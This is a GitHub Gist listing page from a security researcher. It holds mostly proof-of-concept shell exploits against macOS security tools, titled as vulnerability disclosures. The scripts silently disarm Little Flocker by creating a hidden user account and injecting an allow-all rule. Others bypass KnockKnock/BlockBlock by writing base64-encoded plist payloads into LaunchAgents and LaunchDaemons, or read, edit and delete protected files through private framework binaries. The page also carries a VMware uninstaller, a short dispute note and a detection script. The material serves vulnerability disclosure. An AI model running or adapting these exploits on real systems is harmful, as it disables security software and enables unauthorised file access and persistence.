Skip to content

Instantly share code, notes, and snippets.

Sabri pwnsdx

Block or report user

Report or block pwnsdx

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@pwnsdx
pwnsdx / Google Chrome Extension Watcher.flock
Last active Nov 16, 2019
Google Chrome Extension Watcher.flock
View Google Chrome Extension Watcher.flock
watch prefix "$HOME/Library/Application Support/Google/Chrome/Default/Extensions/" "any" wcxm
allow prefix "$HOME/Library/Application Support/Google/Chrome/Default/Extensions/" "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome" r
@pwnsdx
pwnsdx / uninstall_vmware.sh
Last active May 6, 2020 — forked from boneskull/uninstall_vmware.sh
Completely uninstall VMWare on macOS
View uninstall_vmware.sh
#!/usr/bin/env bash
# Usage: bash uninstall_vmware.bash
remove() {
entry="$1"
echo -ne "Removing $entry ["
sudo rm -rf "$entry"
if [[ ! -e "$entry" ]]; then
echo -ne "OK"
@pwnsdx
pwnsdx / ff.sh
Last active Dec 13, 2018
Multiple low severity issues in Little Flocker (<=0.3.1)
View ff.sh
# - An attacker can prevent the agent from showing the app icon (via /dev/null)
mknod /tmp/LittleFlockerTemp.png c 1 3
# - A file with a long name can hide buttons when the popup appear
touch $(printf '\r%.0s' {1..254})$(printf "\x00\x02")
nano $(printf '\r%.0s' {1..254})$(printf "\x00\x02")
# - Little Flocker does not watch every startup folders/files therefore an
# attacker can create startup items at these places (thanks Patrick Wardle):
@pwnsdx
pwnsdx / response.txt
Last active Jul 23, 2017
Response to the new shitty pastebin regarding me
View response.txt
Hello,
Here is the last discussion I had with him (he dared mentioned me on a 10 days old topic and then when I give arguments to the very same topic or replies to his attacks I "harass" him): https://github.com/drduh/OS-X-Security-and-Privacy-Guide/pull/128
So I’m going to do this really fast to prevent making another blog post from happening again and wasting even more time.
Jonathan recycled an old pastebin he made to do some propaganda against me (https://twitter.com/pwnsdx/status/770353299140771840) so I'm going to clarify this here, point by point:
Diff between both pastebin: https://i.imgur.com/TRqgn5g.png
@pwnsdx
pwnsdx / ff.sh
Last active May 31, 2018
Disarm Little Flocker silently (<=0.1.1)
View ff.sh
# Disarm Little Flocker silently (privileged)
FAKEUSER=pwned$(grep -m1 -ao '[0-9][0-9]' /dev/urandom | sed s/10/99/ | head -n1); echo "Creating fake user account..." && dscl . -create /Users/$FAKEUSER IsHidden 1 && dscl . -create /Users/$FAKEUSER UserShell /bin/bash && dscl . -create /Users/$FAKEUSER RealName "${FAKEUSER}" && dscl . -create /Users/$FAKEUSER UniqueID "1202" && dscl . -create /Users/$FAKEUSER PrimaryGroupID 80 && echo "Injecting payload..." && echo 'allow prefix "/" "any" rwcm' > /var/empty/.littleflockerrc && sync && echo "Please wait (up to 1 minute)..." && sleep 61 && dscl . -delete /Users/$FAKEUSER && rm -rf /var/empty/.littleflockerrc && echo "Little Flocker is now disarmed" && cd /Users
# UPDATE (0.0.77)
# Still works, broken fix:
# https://github.com/jzdziarski/littleflocker/commit/bcce9cf279eb27b04cf644ecc49fee767f1e0579
# 1. via /Users/Shared
echo "Creating fake user account..." && dscl . -create /Users/Shared IsHidden 1 && dscl . -create /Users/Shared UserShell /bin/bash && dscl . -
@pwnsdx
pwnsdx / kk.sh
Last active Dec 22, 2018
Bypass KnockKnock (& BlockBlock) LaunchAgents/LaunchDaemons detection (CLI+UI versions) (<=1.9.0, 0DAY)
View kk.sh
# Inject malicious datas into BlockBlock plist (will create "pwned-unprivileged" file in /tmp) (unprivileged)
(> ~/Library/LaunchAgents/com.objectiveSee.blockblock.plist; (echo "YnBsaXN0MDDUAQIDBAUGBQtfEBNBYmFuZG9uUHJvY2Vzc0dyb3VwXxAQUHJvZ3JhbUFyZ3VtZW50c1lSdW5BdExvYWRVTGFiZWwJowcICVRiYXNoUi1jXxBbdG91Y2ggL3RtcC9wd25lZC11bnByaXZpbGVnZWQ7IC9BcHBsaWNhdGlvbnMvQmxvY2tCbG9jay5hcHAvQ29udGVudHMvTWFjT1MvQmxvY2tCbG9jayBhZ2VudAlfECFjb20ub2JqZWN0aXZlU2VlLmJsb2NrYmxvY2suYWdlbnQIESc6REpLT1RXtbYAAAAAAAABAQAAAAAAAAAMAAAAAAAAAAAAAAAAAAAA2g==" | base64 --decode) > ~/Library/LaunchAgents/com.objectiveSee.blockblock.plist)
# Inject malicious datas into BlockBlock plist (will create "pwned-privileged" file in /tmp) (privileged)
(> /Library/LaunchDaemons/com.objectiveSee.blockblock.plist; (echo "YnBsaXN0MDDUAQIDBAUGBQtfEBNBYmFuZG9uUHJvY2Vzc0dyb3VwXxAQUHJvZ3JhbUFyZ3VtZW50c1lSdW5BdExvYWRVTGFiZWwJowcICVRiYXNoUi1jXxBadG91Y2ggL3RtcC9wd25lZC1wcml2aWxlZ2VkOyAvQXBwbGljYXRpb25zL0Jsb2NrQmxvY2suYXBwL0NvbnRlbnRzL01hY09TL0Jsb2NrQmxvY2sgZGFlbW
@pwnsdx
pwnsdx / ff.sh
Last active May 31, 2018
High severity vulnerability in Little Flocker (previously named FlockFlock) (>=0.0.71 <=0.0.74)
View ff.sh
# Read files (privileged)
DIRTOSEE="$HOME/Desktop/test"; DIRSIZE=$(du -mc "$DIRTOSEE" | grep "total" | cut -d$'\t' -f1 | xargs); DIRNAMEHASH=$(echo "$DIRSIZE$DIRTOSEE$(date +%s)" | /usr/bin/openssl sha1); sudo /usr/bin/hdiutil create -ov -size $(($DIRSIZE+1))m -nospotlight -noanyowners -skipunreadable -srcowners off -format UDRO -fs HFS+ -volname .$DIRNAMEHASH -srcfolder "$DIRTOSEE" /tmp/.$DIRNAMEHASH.dmg && hdiutil attach -readonly -noverify -noautofsck -noautoopen -mountpoint /private/tmp/.$DIRNAMEHASH /private/tmp/.$DIRNAMEHASH.dmg && cd /private/tmp/.$DIRNAMEHASH
@pwnsdx
pwnsdx / ff.sh
Last active Aug 29, 2016
Very high severity vulnerability in Little Flocker (previously named FlockFlock) (<=0.0.74)
View ff.sh
# Delete a file (unprivileged)
FILETODELETE="$HOME/Desktop/test/com.evilcorp.plist"; /System/Library/PrivateFrameworks/oncrpc.framework/bin/rpcgen --xdr --output $FILETODELETE
@pwnsdx
pwnsdx / ff.sh
Last active Jul 13, 2018
Very high severity vulnerability in Little Flocker (previously named FlockFlock) (<=0.0.74)
View ff.sh
# Read files (unprivileged)
DIRTOSEE="$HOME/Desktop/test"; mkdir -p /tmp/pwned$DIRTOSEE; $(find $DIRTOSEE -exec sh -c 'if [ -d "$1" ]; then mkdir -p "/tmp/prepwn$1"; fi; touch -f "/tmp/prepwn$1"' _ {} \;); /System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/Resources/shove $DIRTOSEE /tmp/prepwn$DIRTOSEE && cp -R /tmp/prepwn$DIRTOSEE /tmp/pwned$(dirname $DIRTOSEE) && $(find /tmp/prepwn$DIRTOSEE -exec sh -c 'if [ -d "/tmp/prepwn$1" ]; then mkdir -p "$1"; fi; touch -f "$1"' _ {} \;); /System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/Resources/shove /tmp/prepwn$DIRTOSEE $DIRTOSEE; rm -rf /tmp/prepwn
# Edit/Add files (unprivileged)
DIRTOEDIT="$HOME/Desktop/test"; mkdir -p /tmp/pwned$DIRTOEDIT; $(find $DIRTOEDIT -exec sh -c 'if [ -d "$1" ]; then mkdir -p "/tmp/prepwn$1"; fi; touch -f "/tmp/prepwn$1"' _ {} \;); /System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/Resources/shove $DIRTOEDIT /tmp/prepwn$DIRTOEDIT && cp -R /tmp/prepwn$DIRTOEDIT /tmp/pwned$(dirname $DIRTOEDIT)
View detect.sh
#!/bin/bash
echo "Please wait..."
# Look for suspect files
/usr/bin/find -E /Applications -iregex '.*\.app\/(.*\.DS_Store|Icon.{1})$' > /tmp/.suspectfiles
# Check suspect files
appsCounter=0
while read path; do
You can’t perform that action at this time.